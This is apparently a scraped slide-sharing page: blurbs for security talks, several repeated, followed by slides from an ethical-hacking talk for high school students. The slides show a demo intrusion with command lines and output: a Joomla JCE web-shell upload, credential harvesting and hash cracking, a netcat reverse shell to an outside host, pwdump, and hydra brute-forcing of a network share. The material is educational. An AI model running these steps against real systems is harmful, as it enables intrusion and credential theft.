The document discusses an overview of hacking websites. It begins by defining different types of hackers - white hat hackers who hack for non-malicious reasons, black hat hackers who hack for personal gain or maliciously, and grey hat hackers who fall between the two. The document then discusses why security of websites should be cared about, as hackers may be able to access personal information like names, addresses, financial details. It proceeds to describe the process of an ethical hack, including steps like footprinting, scanning, enumeration, exploiting vulnerabilities, escalating privileges to access passwords and internal networks, and potentially accessing shared resources.
So you're logging in to your favorite crypto currency exchange over https using a username and password, executing some transactions, and you're not at all surprised that, security wise, everything's hunky dory...
In order to appreciate and understand what goes on under the hood, as a developer, it's really important to dive into the key concepts of cryptography .
In this presentation, we'll go back to JCA (Java Cryptography API) en JCE (Java Cryptography Extensions) basics, like message digests, symmetric and asymmetric encryption, and digital signatures, and see how they're used in a variety of examples like https and certificates, salted password checking, and block chain technology.
After this presentation, you'll have a better understanding of Java Cryptography APIs and their applications.
Zeus, one of the stealthiest advanced malware has ruled the world of botnets and still posses a significant security risk. In the US alone, Zeus is estimated to have control over 4 million devices. Banks, social networks and email accounts, all have fallen prey to its might and despite of its years in service, no anti virus vendor can claim to detect it reliably. Join Cyphort research team as we explain the inner working of Zeus.
www.cyphort.com for more information
Exploit kits are a critical piece of the malware delivery infrastructure, delivering banking trojans, click fraud engines and ransomware. This small talk will be designed to aid collaboration on a means to tackle these threats with a long-term goal of eventual prosecution of the actors and partners behind exploit kits and their associated malware campaigns. We will discuss the latest research into the backend infrastructure and surveillance techniques of the Nuclear, RIG and Angler exploit kits, to enable all participants to learn what others are doing to stay ahead of them.
So you're logging in to your favorite crypto currency exchange over https using a username and password, executing some transactions, and you're not at all surprised that, security wise, everything's hunky dory...
In order to appreciate and understand what goes on under the hood, as a developer, it's really important to dive into the key concepts of cryptography .
In this presentation, we'll go back to JCA (Java Cryptography API) en JCE (Java Cryptography Extensions) basics, like message digests, symmetric and asymmetric encryption, and digital signatures, and see how they're used in a variety of examples like https and certificates, salted password checking, and block chain technology.
After this presentation, you'll have a better understanding of Java Cryptography APIs and their applications.
Zeus, one of the stealthiest advanced malware has ruled the world of botnets and still posses a significant security risk. In the US alone, Zeus is estimated to have control over 4 million devices. Banks, social networks and email accounts, all have fallen prey to its might and despite of its years in service, no anti virus vendor can claim to detect it reliably. Join Cyphort research team as we explain the inner working of Zeus.
www.cyphort.com for more information
Exploit kits are a critical piece of the malware delivery infrastructure, delivering banking trojans, click fraud engines and ransomware. This small talk will be designed to aid collaboration on a means to tackle these threats with a long-term goal of eventual prosecution of the actors and partners behind exploit kits and their associated malware campaigns. We will discuss the latest research into the backend infrastructure and surveillance techniques of the Nuclear, RIG and Angler exploit kits, to enable all participants to learn what others are doing to stay ahead of them.
This is a presentation I gave to senior high school students. The 1st part is an overview the 2nd part is more detailed on the ways to perform the Ethical Hacking.
Need my help? Contact Keith Brooks via one of the following ways:
Blog http://blog.vanessabrooks.com
Twitter http://twitter.com/lotusevangelist
http://about.me/keithbrooks
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
Breaking Smart Speakers: We are Listening to You.Priyanka Aash
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In this talk, we will present how to use multiple vulnerabilities to achieve remote attack some of the most popular smart speakers. Our final attack effects include silent listening, control speaker speaking content and other demonstrations. And we're also going to talk about how to extract firmware from BGA packages Flash chips such as EMMC, EMCP, NAND Flash, etc. In addition, it contains how to turn on debug interfaces and get root privileges by modifying firmware content and Re-soldering Flash chips, which can be of great help for subsequent vulnerability analysis and debugging. Finally, we will play several demo videos to demonstrate how we can remotely access some Smart Speaker Root permissions and use smart speakers for eavesdropping and playing voice."
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You may have heard about this threat, one that has plagued our lives and networks for well over a decade. A problem so ubiquitous, it can't be ignored. Yet, this threat has a history of hiding in plain sight. Users are, for the most part, unaware of the dangers. Security researchers and the media have attempted to highlight this problem for years, without making an impact on improving security. However, vendors and users are still very much at risk and the problem is still largely being ignored by the masses. The Internet of Things (IoT) aims to makes our lives better, yet there is still no foundation for security controls on the devices that allow us to access the Internet, listen to music, watch television, control the temperature in our homes and more. The goal of this talk is to enable the audience to help raise awareness and influence the security of embedded systems in a positive way.
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
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Need my help? Contact Keith Brooks via one of the following ways:
Blog http://blog.vanessabrooks.com
Twitter http://twitter.com/lotusevangelist
http://about.me/keithbrooks
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
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"In the past two years, smart speakers have become the most popular IoT device, Amazon_ Google and Apple have introduced their own smart speaker products. Most of these smart speakers have natural language recognition, chat, music playback, IoT device control, shopping, and so on. Manufacturers use artificial intelligence technology to make smart speakers have similar human capabilities in the chat conversation. However, with the smart speakers coming into more and more homes, and the function is becoming more powerful, its security has been questioned by many people. People are worried that smart speakers will be hacked to leak their privacy, and our research proves that this concern is very necessary.
In this talk, we will present how to use multiple vulnerabilities to achieve remote attack some of the most popular smart speakers. Our final attack effects include silent listening, control speaker speaking content and other demonstrations. And we're also going to talk about how to extract firmware from BGA packages Flash chips such as EMMC, EMCP, NAND Flash, etc. In addition, it contains how to turn on debug interfaces and get root privileges by modifying firmware content and Re-soldering Flash chips, which can be of great help for subsequent vulnerability analysis and debugging. Finally, we will play several demo videos to demonstrate how we can remotely access some Smart Speaker Root permissions and use smart speakers for eavesdropping and playing voice."
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You may have heard about this threat, one that has plagued our lives and networks for well over a decade. A problem so ubiquitous, it can't be ignored. Yet, this threat has a history of hiding in plain sight. Users are, for the most part, unaware of the dangers. Security researchers and the media have attempted to highlight this problem for years, without making an impact on improving security. However, vendors and users are still very much at risk and the problem is still largely being ignored by the masses. The Internet of Things (IoT) aims to makes our lives better, yet there is still no foundation for security controls on the devices that allow us to access the Internet, listen to music, watch television, control the temperature in our homes and more. The goal of this talk is to enable the audience to help raise awareness and influence the security of embedded systems in a positive way.
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If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
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4. In the computer security context, a hacker is
someone who seeks and exploits weaknesses
in a computer system or computer network.
www.securious.co.uk
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White Hat
Black Hat
Grey Hat
Fall into 3 categories
Breaks security for non-malicious reasons.
‘Ethical Hacker’
Violates computer security for little reason beyond
maliciousness or personal gain.
‘Criminal’
Lies between a black hat and a white hat, may hack systems
for the sole purpose of notifying the Administrator that their
system has a security defect.
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Why should we care?
• Name
• Address
• Date of Birth
• Email Address
• Telephone number
• TalkTalk account information
• Credit Card details and/or bank
account details
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An Ethical Hack
Generally, the method behind most data breaches isn’t
glamorous, and most involves basic stuff, like bad
passwords, insecure remote access, un-patched systems,
default credentials, or a simple breakdown in the human
data control chain.
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Starts with Footprinting and Reconnaissance
• Finding Company’s Public and Restricted Websites
• Determining the Operating System
• Collect Location Information
• People Search: Social Networking Services
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We then conduct Scanning
• Check for LIVE systems (ICMP Scanning)
• Ping Sweeping on a range of IP addresses
• Attempt to obtain a response (ICMP Echo-Reply) that
will indicate if a system is LIVE
• Fping is a useful automated tool and helps speeds up
the scanning process
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Next is Enumeration
• First REAL attack on target network
• Involves active connections to a system and directed
queries
• Attempt to identify network resources and shares
• Find Users, Groups, applications and passwords in
use
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The Hack
Identified a target Website – happens to be running Joomla!
Copyright Dr Paul Dowland,
Secure South West 6
Generated using https://www.shodan.io/
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The Hack
Target specific vulnerability within Joomla! …and deploy a
simple script…
Copyright Dr Paul Dowland,
Secure South West 6
root@kali:~# perl jce.pl target.domain.org
.::. Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 .::.
|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)
||||
[*] Checking Exploitability ...
[*] Trying to upload 0day.gif ...
[*] Trying to change extension from .gif to .php ...
[+] 0day.php was successfully uploaded
[+] Path:
target.domain.org/images/stories/0day.php?cmd=id
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The Hack
We can examine the file system…find blog config and get
MySQL credentials…
Copyright Dr Paul Dowland,
Secure South West 6
/* Database Settings */
var $host = 'localhost';
var $user = 'root';
var $password = 'root';
var $db = 'blog';
var $dbprefix = 'jos _';
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The Hack
Get the blog admin password…Joomla! Uses a simple
hashing mechanism…
md5(Password+salt)
stored as hash:salt
Copyright Dr Paul Dowland,
Secure South West 6
fdb3d81d39d925c1332559d2ea53823e:
Ckbco8niuZ6ZR9lSnB80I8NtJki325j2
Write a simple script with a password list to
crack the hash….
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The Hack
Escalate privileges…
Copyright Dr Paul Dowland,
Secure South West 6
@echo Dumping blog
@"C:Program Files (x86)MySQLMySQL Server
5.5binmysqldump.exe" --user=%dbuser% --
password=%dbpass% --databases blog --log-
error="C:Backupdumperrors.txt" >
"C:Backupblog.%backupdate%.sql"
START c:inetpubwwwrootimagesstoriesnc
x.x.x.y 80 -e cmd.exe
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The Hack
Get Windows Passwords…
Copyright Dr Paul Dowland,
Secure South West 6
>pwdump7
Administrator:500:NO
PASSWORD*********************:47443E24FE435EB5210D91EF28
38659D:::
Guest:501:NO PASSWORD*********************:NO
PASSWORD*********************:::
hackme:1004:NO
PASSWORD*********************:F1B94635FACC09D9FCC637A113
DC10B1:::
hackme2:1005:NO
PASSWORD*********************:079F890A968B7F710A373ABB79
EB11EB:::
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
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The Hack
Cracked…in around 15 minutes, using FREE tool..!
Copyright Dr Paul Dowland,
Secure South West 6
Via: http://ophcrack.sourceforge.net/
079F890A968B7F710A373ABB79EB11EB
Wizard1!
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The Hack
Scan INTERNAL network…
Copyright Dr Paul Dowland,
Secure South West 6
>nmap -sn 192.168.1.0/24
Starting Nmap 7.01 ( https://nmap.org )
MAC Address: 00:1E:67:9A:7E:23 (Intel Corporate)
Nmap scan report for 192.168.1.50
Host is up (0.00s latency).
MAC Address: 00:1D:73:FA:11:D2 (Buffalo.inc)
Nmap scan report for 192.168.1.200
Host is up (0.00s latency).
MAC Address: 00:24:B2:BA:6C:90 (Netgear)
Nmap scan report for 192.168.1.100
Host is up (0.00s latency).
MAC Address: 00:24:B2:BA:66:B4 (Netgear)
Nmap scan report for 192.168.1.101
Host is up (0.00s latency).
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The Hack
Scan INTERESTING host…
Copyright Dr Paul Dowland,
Secure South West 6
>nmap 192.168.1.200
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.1.200
Host is up (0.00s latency).
Not shown: 1084 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open sunrpc
139/tcp open netbios-ssn
199/tcp open unknown
443/tcp open https
445/tcp open microsoft-ds
548/tcp open afpovertcp
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The Hack
Enumerate the shares…
Copyright Dr Paul Dowland,
Secure South West 6
>net view 192.168.1.200
Shared resources at 192.168.1.200
TEST-NAS_SECRET_Storage_01
Share name Type Used as Comment
----------------------------------------
Applications Disk Applications share
DiskImages Disk Imaging Share
Media Disk Media Share
Projects Disk Projects share
Scratch Disk Scratch space
The command completed successfully.
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The Hack
Access the Network Storage Device…(Password cracking tool)
Copyright Dr Paul Dowland,
Secure South West 6
>hydra -l hackme -P top500.txt -s 443 192.168.1.200
https-get /shares/
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not
use in military or secret service organizations, or
for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-
02-07 23:16:06
[DATA] max 16 tasks per 1 server, overall 64 tasks,
500 login tries (l:1/p:500),
~0 tries per task
[DATA] attacking service http-get on port 443 with SSL
[443][http-get] host: 192.168.1.200 login: Admin
password: letmeIN
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The Hack
Enjoy….
Copyright Dr Paul Dowland,
Secure South West 6
>net use z: 192.168.1.200diskimages
letmeIN /USER:Admin
The command completed successfully.
>dir z:
Volume in drive Z is DiskImages
Volume Serial Number is 3A5C-C2B8
Directory of Z:
10/01/2016 15:00 <DIR> .
11/05/2015 22:01 <DIR> ..
04/11/2014 15:48 <DIR> Test Stuff
22/07/2015 22:02 <DIR> SECRET STUFF
17/10/2014 15:48 <DIR> Old Stuff
...